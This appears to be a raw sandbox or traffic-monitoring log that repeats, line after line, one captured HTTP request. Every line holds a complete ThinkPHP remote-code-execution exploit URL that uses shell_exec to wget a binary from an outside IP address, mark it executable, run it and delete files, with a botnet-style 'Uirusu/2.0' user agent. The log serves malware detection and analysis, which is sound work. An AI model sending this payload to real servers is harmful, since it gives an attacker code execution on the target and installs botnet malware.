Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
Source: global traffic	HTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
